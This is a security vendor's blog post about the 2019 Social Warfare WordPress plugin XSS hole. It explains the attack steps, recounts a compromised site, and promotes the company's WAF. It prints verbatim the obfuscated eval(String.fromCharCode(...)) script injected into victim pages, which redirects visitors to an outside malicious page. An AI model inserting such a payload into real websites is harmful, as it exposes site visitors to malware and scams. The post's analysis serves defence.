Wordpress plugin, Social Warfare exposes sites to XSS attacks, was the alert that went out on March 21st 2019. A plugin named "Social Warfare" used by Wordpress sites allowed hackers to inject code into their websites, its estimated that 70,000 websites were effected. It was labelled as A "Zero-Day" Attack which has always confused me because at one time every exploit was a "Zero-Day" attack. It was reported that many hackers were already out there in the wild looking for websites that had the unpatched version of Social Warfare.
How XSS Works
Step 1) Hacker finds vulnerable website
Step 2) Injects Java script code into vulnerable website
Step 3) Victim visitor visits website
Step 4) Victim Website visitor is redirected to another malicious website
Step 5) Victim unknowingly clicks and downloads malicious software
Step 5 is where the real damage gets done, with the help of an unpatched/unprotected Website
So what does the above 5 steps look in real life
I actually visited a website that had been compromised by the XSS attack. When I went to the website which is a site that has some free tools to do network-lookups, trace-routes, etc and I have been using this site for over 15 years. This day when I visited, I was greeting by some porn site complete with a 5 second video loop. I knew something was wrong right away, I checked my URL and yes I had the right destination But wrong content for sure. I waited a couple of hours and tried again, this time the content was different as you can see below
I can only assume that the hackers could fool some people to install the fake MAC cleaner, Having just had a some random porn content pop up on their browser.
Strange as it seems this site is still active as I write this piece 3 days later !
Back to the main story….. I wanted to see the code that was injected into the unsuspecting website participating in the attack that would lead website visitors to another website that they never intended to visit.
The attacker used XSS to include the following Javascript into the page head:
<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 108, 108, 116, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 101, 116, 102, 111, 114, 99, 111, 110, 102, 105, 103, 112, 108, 101, 97, 115, 101, 46, 99, 111, 109, 47, 119, 101, 110, 98, 51, 52, 104, 103, 113, 102, 99, 97, 53, 54, 55, 53, 54, 56, 57, 53, 55, 57, 46, 112, 104, 112, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 108, 108, 116, 32, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 108, 108, 116, 32, 59, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 108, 108, 116, 59));</script>"><meta property="twitter_creator" content="@"><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 108, 108, 116, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 101, 116, 102, 111, 114, 99, 111, 110, 102, 105, 103, 112, 108, 101, 97, 115, 101, 46, 99, 111, 109, 47, 119, 101, 110, 98, 51, 52, 104, 103, 113, 102, 99, 97, 53, 54, 55, 53, 54, 56, 57, 53, 55, 57, 46, 112, 104, 112, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 108, 108, 116, 32, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 108, 108, 116, 32, 59, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 108, 108, 116, 59));</script>">
This is a browser redirect to a different page (document.location.replace;document.location.href;window.location.href)
There are probably thousands of websites that don’t even know they have infected sites participating in such an attack.
What does this mean for DOSarrest customers ? Nothing really because if you have our WAF enabled you were protected pre "Zero-day" That’s right you were protected before the exploit was even discovered. Our WAF is based on a positive security model, not a negative model which is based on signatures of malicious code. All the panic was that this new exploit Does not have a signature yet, that WAF admins can upload to their systems.
All of the numbers and commas above would never of been able to pass through our WAF.
There are no signatures in a positive model based WAF !!!
Here’s a real-time view of attempted XSS attempts that we block, from a sample of our customer base.
http://attackmap.ddos-protection.org
Tip ! You can Toggle on/off the types of attacks you want to see and their source IPs
Mark Teolis
CEO, DOSarrest Internet Security
